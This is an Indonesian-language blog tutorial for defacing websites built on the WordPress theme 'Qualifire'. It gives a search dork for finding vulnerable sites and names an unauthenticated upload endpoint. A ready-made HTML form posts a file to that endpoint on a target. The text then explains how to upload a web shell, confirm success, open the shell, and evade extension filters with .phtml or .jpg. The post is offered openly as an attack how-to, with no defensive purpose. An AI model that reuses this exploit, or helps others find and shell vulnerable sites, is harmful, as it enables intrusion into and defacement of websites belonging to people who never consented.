Home > Deface > Tutorial > Defece Wordpress Themes Qualifire

Defece Wordpress Themes Qualifire

May 17, 2017 Deface, Tutorial

Dork: inurl:"wp-content/themes/qualifire

Exploit : /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php

Vuln target Exploit : Blank tampilannya ( putih semua ga ada gambar atau tulisan )

CSRF : save dengan ext .HTML

<form method="POST" action="http://www.target.com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
enctype="multipart/form-data"><input type="file" name="Filedata" /><button>Upload</button><br />
</form>

Kalau Sukses Upload shelmu , nanti akan ada tulisan angka 1 ( cuma angka 1 , ga ada yang lain )

Akses shelmu : www.site.com/Shelmu.php

NB : Tidak semua web support file ext .PHP , coba kamu ganti dengan ext .jpg / phtml dll . kalau tidak bisa di upload shelmu pakai Script defecanmu saja..

Semoga bermanfaat

No comments

Subscribe to: Post Comments ( Atom )